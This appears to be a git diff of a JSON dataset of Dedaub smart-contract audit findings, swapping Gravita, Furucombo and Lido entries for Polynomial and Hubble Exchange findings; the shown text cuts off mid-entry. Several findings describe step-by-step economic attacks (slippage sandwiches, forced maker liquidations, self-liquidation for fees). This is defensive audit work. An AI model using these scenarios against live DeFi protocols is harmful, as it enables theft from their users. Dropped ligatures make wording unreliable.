include: StabilityPool initializes Ownable, relinquishes ownership, but never checks ownership in setAddresses, or elsewhere. function setAddresses( address _borrowerOperationsAddress, address _vesselManagerAddress, address _activePoolAddress, address _debtTokenAddress, address _sortedVesselsAddress, address _communityIssuanceAddress, address _adminContractAddress ) external initializer override { __Ownable_init(); renounceOwnership(); // Dedaub: The function was onlyOwner in Liquity, here there's // no point of Ownable } VesselManagerOperations inherits and initializes ownable functionality but is it used? function setAddresses( address _vesselManagerAddress, address _sortedVesselsAddress, address _stabilityPoolAddress, address _collSurplusPoolAddress, address _debtTokenAddress, address _adminContractAddress ) external initializer { __Ownable_init(); // YS:! why? 2 }", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "calls to LiquidityPool from KangarooVault INFO The functions removeCollateral and _openPosition of the KangarooVault contract, call LiquidityPool::getMarkPrice to get the mark price. However, this function only calls Exchange::getMarkPrice without adding any extra functionality. Therefore, we recommend making a direct call to Exchange::getMarkPrice from KangarooVault instead, to save some gas.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "explicit check in BorrowerOperations::openVessel that the collateral deposited by the user is approved INFO If a user aempts to open a Vessel with a collateral asset not approved by the owner, the transaction will fail, because there will be no price oracle registered for this asset. Therefore it is checked if the user deposits an approved collateral asset, but only indirectly. It would be beer if there was an explicit check.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "could be made external INFO The following functions could be made external instead of public, as they are not called by any of the contract functions: Exchange.sol refresh orderFee LiquidityPool.sol LiquidityToken.sol PowerPerp.sol ShortToken.sol refresh ShortCollateral.sol SynthetixAdapter.sol refresh getMinCollateral canLiquidate maxLiquidatableDebt getSynth getCurrencyKey getAssetPrice getAssetPrice SystemManager.sol init setStatusFunction 2", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "only partially initializes the collateralParams structure INFO We cannot nd a specic problem with the current only partial initialization, since even if the owner just adds a new _collateral and does not set all the elds of collateralParams[_collateral], upon opening a Vessel the protocol sets the default values for these. But, in general it is not a good practice to leave uninitialized variables and it would be beer if in addnewCollateral the owner also set the default values for the remaining collateralParams elements.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "overrides INFO All function and storage variable overrides in the Exchange, LiquidityPool, ShortCollateral and SynthetixAdapter contracts are redundant and can be removed.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "internal functions INFO In StabilityPool, the following two functions are unused. function _requireUserHasVessel(address _depositor) internal view { address[] memory assets = adminContract.getValidCollateral(); uint256 assetsLen = assets.length; for (uint256 i; i < assetsLen; ++i) { if (vesselManager.getVesselStatus(assets[i], _depositor) == 1) { return; } } revert(\"StabilityPool: caller must have an active vessel to withdraw AssetGain to\"); 2 } function _requireUserHasAssetGain(address _depositor) internal view { (address[] memory assets, uint256[] memory amounts) = getDepositorGains(_depositor); for (uint256 i = 0; i < assets.length; ++i) { if (amounts[i] > 0) { return; } } revert(\"StabilityPool: caller must have non-zero gains\"); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "storage variables INFO There is a number of storage variables that are not used: Exchange:SUSD KangarooVault:maxDepositAmount LiquidityPool:addressResolver", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "mistakes in names or comments INFO This issue collects several items, all supercial, but easy to x. AdminContract: uint256 public constant PERCENT_DIVISOR_DEFAULT = 100; // dividing by 100 yields 0.5% // Dedaub: No, it yields 1% AdminContract: function setAsDefaultWithRemptionBlock( // Dedaub: spelling AdminContract: struct CollateralParams { } uint256 redemptionBlock; // Dedaub: misnamed, its in seconds (We advise special caution, since the eld is set in two ways, so external callers may be confused by the name and pass a block number, whereas the calculation is in terms of seconds.) StabilityPool: 2 // Internal function, used to calculcate ... PriceFeed: * - If price decreased, the percentage deviation is in relation to the the FeeCollector: function _createFeeRecord( address _borrower, address _asset, uint256 _feeAmount, FeeRecord storage _sRecord ) internal { uint256 from = block.timestamp + MIN_FEE_DAYS * 24 * 60 * 60; // Dedaub: `1 days` is the best way to write this, as done // elsewhere in the code", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "variables can be made immutable INFO The following storage variables can be made immutable: SystemManager.sol SynthetixAdapter.sol addressResolver futuresMarketManager synthetix exchangeRates", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "for gas optimization INFO Gas savings were not a focus of the audit, but there are some clear instances of repeat work or missed opportunities for immutable elds. StabilityPool: function receivedERC20(address _asset, uint256 _amount) external override { } totalColl.amounts[collateralIndex] += _amount; uint256 newAssetBalance = totalColl.amounts[collateralIndex]; The two highlighted lines (likely) perform two SLOADs and one SSTORE. Using an intermediate temporary variable for the sum will save an SLOAD. DebtToken: the following variable is only set in constructor, could be declared immutable. address public timelockAddress; 2", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "is not used INFO The function liquidate of the LiquidityPool contract is not called by the Exchange, which is the only contract that would be able to call it. At the same time, this means that the LiquidityPool::_hedge function is always called with its second argument being set to false. Furthermore, if this function is maintained for future use, we raise a warning here that hedgingFees are accounted for twice. Once by LiquidityPool::_hedge and another one directly inside liquidate function. LiquidityPool::liquidate() function liquidate( 2 uint256 amount ) external override onlyExchange nonReentrant { ... uint256 hedgingFees = _hedge(int256(amount), true); // Dedaub: hedgingFees are double counted here usedFunds += int256(hedgingFees); emit Liquidate(markPrice, amount); }", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "constants INFO Our recommendation is for all numeric constants to be given a symbolic name at the top of the contract, instead of being interspersed in the code. VesselManagerOperations::getRedemptionHints: collLot = collLot * REDEMPTION_SOFTENING_PARAM / 1000; AdminContract::setAsDefaultWithRedemptionBlock: if (blockInDays > 14) { ... BorrowerOperations::openVessel: contractsCache.vesselManager.setVesselStatus(vars.asset, msg.sender, 1); // Dedaub: 1 stands for \"active, but is obscure", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "code comment INFO The code comment of KangarooVault::saveToken mentions Save ER", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "inconsistent INFO Contract IDebtToken is not really an interface, since it contains full ER", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "from the vault (not SUSD or UNDERLYING) when there is no notion of an UNDERLYING token.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Critical" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "functionality.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "in the use of the word recipient INFO In LiquidityPool, KangarooVault and ILiquidityPool, all appearances of the word recipient word contain a typo and are wrien as receipient. For example, the fee recipient storage variable is wrien as feeReceipient instead of feeRecipient.", "labels": [ "Dedaub", - "Gravita", - "Severity: Critical" + "Polynomial Power Perp Contracts", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "allowed deviation between two consecutive oracle prices seems to be too high INFO In PriceFeed.sol there is a MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND constant set to 5e17 i.e. 50%. If the percentage deviation of two consecutive Chainlink responses is greater than this constant, the protocol rejects the new price as invalid. But the value of this constant seems to be too high. Moreover, we think it would be beer if the protocol used a dierent MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND for each collateral asset considering also the volatility of the asset. A23 Compiler bugs INFO 2 The code has the compile pragma ^0.8.10. For deployment, we recommend no floating pragmas, i.e., a xed version, for predictability. Solc version 0.8.10, specically, has some known bugs, which we do not believe to aect the correctness of the contracts. 2", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "duplication INFO The functions canLiquidate and maxLiquidatableDebt of ShortCollateral.sol share a large proportion of their code. For readability this part coud be included in a separate method.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", - "body": "use of weak blacklists Furucombo Gelato makes use of a number of blacklists including: - Who can create a new task - What task can be created It is however trivial for any user to get around this blacklisting style. For instance, in the case of a task, one can simply add some additional calldata which does not aect the semantics of the task. Therefore, if there is a reason to blacklist users or tasks, a stronger mechanism needs to be designed. L2 delegateCallOnly methods not properly guarded in Actions CLOSED In TaskExecutor the delegateCallOnly() modier is dened to ensure that the batchExec() method is only called via delegate call, as intended by the deployers. This can be reused by the other Actions as well, to make sure that they are not misused. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend addressing them. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "large liquidation bonus percentage could lead to a decrease instead of the expected increase- of the collateral ratio INFO A liquidation of a part of an underwater position is expected to increase its collateralization ratio. In a partial liquidation, the liquidator deletes part of the position 2 and gets collateral of the same value, but also some extra collateral as liquidation bonus. If the liquidation bonus percentage is large, the collateral ratio after the liquidation could be lower compared to the one before. The parameters of the protocol should be chosen carefully to avoid this problem. For example: WIPEOUT_CUTOFF * coll.liqRatio > 1 + coll.liqBonus", "labels": [ "Dedaub", - "Furucombo smart wallet and gelato", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Informational" ] }, { - "title": "pragma ", - "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", - "body": " CLOSED The floating pragma pragma solidity ^0.6.0; is used in most contracts, allowing them to be compiled with the 0.6.0 - 0.6.12 versions of the Solidity compiler. Although the dierences between these versions are small, floating pragmas should be avoided and the pragma should be xed to the version that will be used for the contracts deployment. A2 Compiler known issues INFO The contracts were compiled with the Solidity compiler 0.6.12 which, at the time of writing, has multiple issues related to memory arrays. Since furrucombo-smart-wallet makes heavy use of memory arrays, and sending and receiving these to third party contracts, it is worth considering switching to a newer version of the Solidity compiler. 0", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "check that normalizationUpdate is positive INFO The functions getMarkPrice and updateFundingRate of the Exchange contract compute the normalizationUpdate variable using the formula: int256 totalFunding = wadMul(fundingRate, (currentTimeStamp - fundingLastUpdatedTimestamp)); int256 normalizationUpdate = 1e18 - totalFunding; Although the fundingRate is bounded (it takes values between -maxFunding and maxFunding), the dierence currentTimeStamp - fundingLastUpdatedTimestamp is not, therefore totalFunding can in principle have an arbitrarily large value, especially a value greater than 1e18 (using 18 decimals precision). The result would be a negative normalizationUpdate and negative mark price, which would mess all the computations of the protocol. A check that normalizationUpdate is positive could be added. Nevertheless, since the value of the maxFunding is 1e16, the protocol has to be inactive for at least 100 days, before this issue occurs. A17 Compiler version and possible bugs INFO The code can be compiled with Solidity 0.8.9 or higher. For deployment, we recommend no floating pragmas, but a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.9, in particular, has some known bugs, which we do not believe aect the correctness of the contracts. 2", "labels": [ "Dedaub", - "Furucombo smart wallet and gelato", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "may irreversibly delete essential data DISMISSED Oracle::setNodeIDList deletes reportsByEpochId[latestEpochId], i.e., the latest epoch data, as they might no longer be valid due to validators being removed from the list. The latest epoch data is supplied to the Oracle contract via the OracleManager, which calls the function Oracle::receiveFinalizedReport and marks that the report for that epoch has been nalized, meaning that it cannot be resubmied. This information, which might irreversibly get deleted by the Oracle::setNodeIDList, is essential for the ValidatorSelector contract to proceed with the validator selection process. Thus, care should be taken to ensure that Oracle::setNodeIDList isnt called after OracleManager::receiveMemberReport and before ValidatorSelector::getAvailableValidatorsWithCapacity, as such a sequence of calls would leave the system in an invalid state.", + "title": "Liquidations of Maker ", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": " DISMISSED The crypto-economic design of this protocol can lead to force-liquidation of Makers through very small price movements. The following design elements make it easy to force liquidate makers: - Curve-Crypto AMM can yield the same price with dierent pool compositions - Spread limit is hard to trigger with single transactions Scenario: Bob wants to force liquidate Alices maker position to perform a liquidation slippage sandwich. [Note: the following gures are approximate] 1. With a small amount of margin, Alice opens a maker position: $3000 + 0.5ETH, when ETH is at $2000. Note that the pool is not perfectly balanced. 2. Bob opens a large short position, say 10ETH, moving ETH price to $1900. 3. The pools composition changed signicantly with one swap, but not the price. 4. Alices position is now around $1100 + 1.5ETH, so openNotional = 1900 and position = 1 5. Alices maker debt is $6000 6. Alices notionalPosition is $7900 0 The result is that with < 5% price change, Alices margin fraction has decreased by 25%", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "may revert due to array out-of-bounds error in ValidatorSelector::getAvailableValidatorsWithCapacity RESOLVED Function ValidatorSelector::getAvailableValidatorsWithCapacity retrieves the latest epoch validators from the Oracle in the validators array, computes how 0 many of those satisfy the ltering criteria and then creates an array of that size, result, and traverses again the validators array to populate it. function getAvailableValidatorsWithCapacity(uint256 amount) public view returns (Validator[] memory) { Validator[] memory validators = oracle.getLatestValidators(); uint256 count = 0; for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) count++; } Validator[] memory result = new Validator[](count); for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) // Dedaub: index can get bigger than result.length. // Dedaub: a count variable needs to be used as in the above loop. result[index] = validators[index]; } return result; } However, there is a bug in the implementation that can cause an array out-of-bounds exception at line result[index] = validators[index]. Variable index is in the range [0, validators.length-1], while result.length will be strictly less than validators.length-1 if at least one validator has been ltered out of the initial validators array, thus index might be greater than result.length-1. Consider the scenario where validators = [1, 2] and count (or result.length) is 1 as the validator with id 1 has been ltered out. Then the second loop will traverse the whole validators array and will try to assign the validator with id 2 (array index 1) to result[1] causing an out-of-bounds exception, as result has a length of 1 (can only be assigned to index 0). Using a count variable, similarly to the rst loop, would be enough to solve this issue. 0", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "process is easily circumvented DISMISSED The unbonding process can be easily circumvented through a variation on the Sybil aack. Unbonding liquidity at will enables other aacks such as liquidity frontrunning. Scenario: Alice wants to add amount of liquidity, and be able to withdraw /3 of her liquidity on any one day. We assume that the withdrawal period is N days and the unbonding period is M days. This means that using the following strategy, alice can always remove / liquidity, like so: 1. Alice deposits / each day for M days on M dierent addresses 2. After M days, Alice goes through each address where the withdrawal expired and requests unbonding again. 3. At any day, after the rst M days, alice can withdraw up to / of her liquidity.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "due to the ability of a group to conrm any public key RESOLVED A DoS aack could be possible due to the ability of a group to perform conrmations for any given public key. More specically, we think that a group with adversary members can front-run the reportGeneratedKey() using a public key which was requested by another group, via requestKeygen(). By doing so, this public key will be conrmed by and assigned to the adversary group. // MpcManager.sol::reportGeneratedKey:214 if (_generatedKeyConfirmedByAll(groupId, generatedPublicKey)) { info.groupId = groupId; info.confirmed = true; ... } This will DoS the system for the benevolent group which will not be able to perform any further conrmations for this public key. // MpcManager.sol::reportGeneratedKey:208 if (info.confirmed) revert AttemptToReconfirmKey(); The adversary group can then proceed with joining the staking request changing the threshold needed for starting the request (of course in the case where the adversary group has a smaller threshold than the original one). // MpcManager.sol::joinRequest:238 uint256 threshold = _groupThreshold[info.groupId]; However, they dont have to join the request and can leave it pending. Since multiple public keys can be requested for the same group, they can proceed with dierent keys and dierent stake requests if they wish to interact with the contracts benevolently for their own benet. 0 The MpcManager.sol contract has quite a bit of o-chain logic, but we believe that it is valid as an adversary model to assume that groups can not be entirely trusted and that they can act adversely against other benevolent groups. In the opposite scenario, considering all groups as trusted could lead to centralization issues while only the MPC manager can create the groups.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "amount is not reset on liquidation RESOLVED A makers liquidation calls method AMM::forceRemoveLiquidity, which in turn calls AMM::_removeLiquidity and operates in the same manner as the regular removeLiquidity thereafter, but does not reset a pending unbonding amount that the maker might have. The function AMM::removeLiquidity on the other hand, deducts the unbonding amount accordingly: Maker storage _maker = _makers[maker]; _maker.unbondAmount -= amount;", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "can be called by a member of RESOLVED any group with any generated public key MpcManager::reportUTXO() does not contain any checks to ensure that the member which calls it is a member of the group that reported and conrmed the provided genPubKey. This means that a member of any group can call this function with any of the generated public keys even if the laer has been conrmed by and assigned to another group. By doing so, a group can run reportUTXO() changing the threshold needed for the report to be exported. It is not clear from the specication if allowing any member to call this function with any public key is the desired behaviour or if further checks should be applied.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "Liquidations ACKNOWLEDGED 0 The risk of cascading liquidations in Hubble are relatively high, especially where maker liquidations are concerned. Takers are relatively protected from triggering liquidations of other takers due to the dual mode margin fraction mechanism (which uses oracle prices in cases of large divergences between mark and index prices). However, a taker liquidation can trigger a maker liquidation (see M1). In turn the removal of maker liquidity makes the price derived via Swap::get_dy and Swap::get_dx lower. The following are our inferred cascading liquidation risks: - Taker liquidation triggering a taker liquidation (low) - Maker liquidation triggering a taker liquidation (medium, eect of swap price movement in addition to the eect of removal of liquidity) - Maker liquidation triggering a maker liquidation (high, see M1) - Taker liquidation triggering a maker liquidation (high, see M1)", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { - "title": "number of remaining TODO items suggest certain functionality is not implemented RESOLVED There are a number of TODO items that spread across the entire codebase and test suite. Most of these TODOs are trivial and the test suite appears to be well developed. However, there is a small number of TODOs that concern checks and invariants and also unimplemented functionality like supporting more types of validator requests. This could mean that further development is needed, which could render the current security assessment partially insuicient. 010 LOW SEVERITY: ID Descriptio ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "stakers who double as liquidators can increase their share of the pool RESOLVED [This issue was partially known to the developers] If an insurance staker also doubles as a liquidator, then they can: 1. Withdraw their insurance contribution 2. Liquidate bad debt 3. Sele bad debt using other users insurance stake 4. Re-deposit their stake again The liquidator/staker now owns a larger portion of the pool. This eect can be compounded. Opening multiple tiny positions to make liquidations", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "claim of AVAX might result in rounding errors RESOLVED According to a note in the AvaLido::claim function, the protocol allows partial claims of unstake requests so that users don't need to wait for the entire request to be lled to get some liquidity. This is one of the reasons the exchange rate stAVAX:AVAX is set in function requestWithdrawal instead of in claim. The partial claim logic is implemented mainly in the following line: uint256 amountOfStAVAXToBurn = Math.mulDiv(request.stAVAXLocked, amount, request.amountRequested); The amount of stAVAX that are traded back, request.stAVAXLocked, is multiplied by the amount of AVAX claimed, amount, and the result is divided by the whole AVAX amount corresponding to the request, request.amountRequested to give us the corresponding amount of stAVAX that should be burned. This computation might suer from rounding errors depending on the amount parameter, leading to a small amount of stAVAX not being burned. We believe that these amounts would be too small to really aect the exchange rate of stAVAX:AVAX, still it would make sense to verify this or get rid of the rounding error altogether.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "unprotable 0 There are no restrictions on the minimum size of the position a user can open and on the minimum amount of collateral he should deposit when an account is opened. A really small position will be unprotable for an arbitrageur to liquidate. An adversary could take advantage of this fact and open a huge number of tiny positions, using dierent accounts. The adversary might not be able to get a direct prot from such an approach, but since these positions are going to stay open for a long time, as no one will have a prot by liquidating them, they can signicantly shift the price of the vAMM with small risk. To safeguard against such aacks we suggest that a lower bound on the position size and collateral should be used. Liquidating own tiny maker position to prot from the xed", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Low" + "Hubble Exchange", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "might fail due to uninitialized variable RESOLVED Function Treasury::claim could be called while the avaLidoAddress storage variable might not have been set via the setAvaLidoAddress, leading to the transaction reverting due to msg.sender not being equal to address(0). This outcome can of course be considered desirable, but at the same time, the needed call to setAvaLidoAddresss adds unnecessary complexity. Currently, the setAvaLidoAddress function works practically as an initializer, as it cannot set the 01 avaLidoAddress storage variable more than once. If that is the intent, avaLidoAddress could be set in the initialize function, which would reduce the chances of claim and successively of AvaLido::claimUnstakedPrincipals and AvaLido::claimRewards calls reverting. L3 AvaLido::deposit check considers deposited amount twice RESOLVED The function AvaLido::deposit implements the following check: if (protocolControlledAVAX() + amount > maxProtocolControlledAVAX) revert ProtocolStakedAmountTooLarge(); However, the check should be changed to: if (protocolControlledAVAX() > maxProtocolControlledAVAX) revert ProtocolStakedAmountTooLarge(); as the function protocolControlledAVAX() uses address(this).balance, meaning that amount, which is equal to the msg.value, has already been taken into account once and if added to the value returned by protocolControlledAVAX(), it would be counted twice. Nevertheless, we expect that both conditions would never be satised as maxProtocolControlledAVAX is by default set to type(uint256).max. Still, we would advise addressing the issue just in case maxProtocolControlledAVAX is changed in the future. 01 CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) The protocol denes several admin/manager roles that serve to give access to specic functions of certain contracts only to the appropriate entities. The following roles are dened and used: DEFAULT_ADMIN_ROLE ROLE_PAUSE_MANAGER ROLE_FEE_MANAGER ROLE_ORACLE_ADMIN ROLE_VALIDATOR_MANAGER ROLE_MPC_MANAGER ROLE_TREASURY_MANAGER ROLE_PROTOCOL_MANAGER For example, the entity that is assigned the ROLE_MPC_MANAGER is able to call functions MpcManager::createGroup and MpcManager::requestKeygen that are essential for the correct functioning of the MPC component. Multiple roles allow for the distribution of power so that if one entity gets hacked all other functions of the protocol remain unaected. Of course, this assumes that the protocol team distributes the dierent roles to separate entities thoughtfully and does not completely alleviate centralization issues. The contract MpcManager.sol appears to build on/depend on a lot of o-chain logic that could make it suer from centralization issues as well. A possible aack scenario is described in issue M3 above that raises the question of credibility for the MPC groups even though they can only be created by the MPC manager. 01 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", - "labels": [ + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "fee As discussed in issue M6, one can open a however small position they want. The same is true when providing liquidity. On the other hand the incentive fee for liquidating a maker, i.e., someone that provides liquidity, is xed and its 20 dollars as dened in ClearingHouse::fixedMakerLiquidationFee. Thus, one could provide really tiny amounts of liquidity (with tiny amounts of collateral backing it) and liquidate themselves with another account to make a prot from the liquidation fee. Networks with small transaction fees (e.g., Avalanche) or", + "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Low" + "Hubble Exchange", + "Severity: Medium" ] }, { - "title": "array of public keys provided to MpcManager::createGroup needs to be sorted ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": " RESOLVED The array of public keys provided to MpcManager::createGroup by the MPC manager needs to be sorted otherwise the groupId produced by the keccak256 of the array might be dierent for the same sets of public keys. As sorting is tricky to perform on-chain and has not been implemented in this instance, the contracts API or documentation should make it clear that the array provided needs to be already sorted.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "could make such an aack really protable, especially if executed on a large scale. ClearingHouse::isMaker does not take into account makers", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "in AvaLido::llUnstakeRequests is always true RESOLVED The following check in AvaLido::fillUnstakeRequests is expected to be always true, since the isFilled check right before guarantees that the request is not lled. if (isFilled(unstakeRequests[i])) { // This shouldn't happen, but revert if it does for clearer testing revert(\"Invalid state - filled request in queue\"); } // Dedaub: the following is expected to be always true if (unstakeRequests[i].amountFilled < unstakeRequests[i].amountRequested) { ... } 01", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "ignition share Method ClearingHouse::isMaker checks if a user is a maker by implementing the following check: function isMaker(address trader) override public view returns(bool) { uint numAmms = amms.length; for (uint i; i < numAmms; ++i) { IAMM.Maker memory maker = amms[i].makers(trader); if (maker.dToken > 0) { 0 return true; } } return false; } However, the AMM could still be in the ignition phase, meaning that the maker could have provided liquidity that in maker.ignition. This omission could allow liquidation of a users taker positions before its maker positions, which is something undesirable, as dened by the liquidate and liquidateTaker methods of ClearingHouse. reflected in maker.dToken but is not yet", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "responsible for seing/updating numeric protocol parameters could dene bounds on these values INFO Functions like AvaLido::setStakePeriod and AvaLido::setMinStakeAmount could set lower and/or upper bounds for the accepted values. Such a change might require more initial thought but could protect against accidental mistakes when seing these parameters.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "Slippage Sandwich Attack ACKNOWLEDGED [The aack is related to already known issues, but is documented in more detail here] 1. Alice has a long position that is underwater 2. Bob opens a large short position 3. Bob liquidates Alice. This triggers a swap in the same direction as Bobs position and causes slippage. 4. Bob closes his position, and prots on the slippage at the expense of Alice. M10 Self close bad debt attack DISMISSED This is a non-specic aack on the economics of the protocol. 1. Alice opens a short position using account A 2. Alice opens a large long position using account B 3. In the meantime, the market moves up. 4. Alice closes her under-collateralized position A. Bad debt occurs. 5. Alice can now close position B and realize her prot 09 LOW SEVERITY: ", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Medium" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "might revert with ClaimTooLarge error INFO The function AvaLido::claim checks that the amount requested, amount, is not greater than request.amountFilled - request.amountClaimed. The user experience could be improved if in such cases instead of reverting the claimed amount was set to request.amountFilled - request.amountClaimed, i.e., the maximum amount that can be claimed at the moment. Such a change would require the claim function to return the claimed amount.", + "title": "neutra ", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": " ACKNOWLEDGED Maker debt, calculated as the vUSD amount * 2 when the liquidity was added never changes. If the maker has gained out of her impermanent position, e.g., through fees, this is not accounted for, in certain kinds of liquidations (via oracle). However, if the maker now removes their liquidity, closes their impermanent position and adds the same amount of liquidity, the debt is reset to a dierent amount.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - 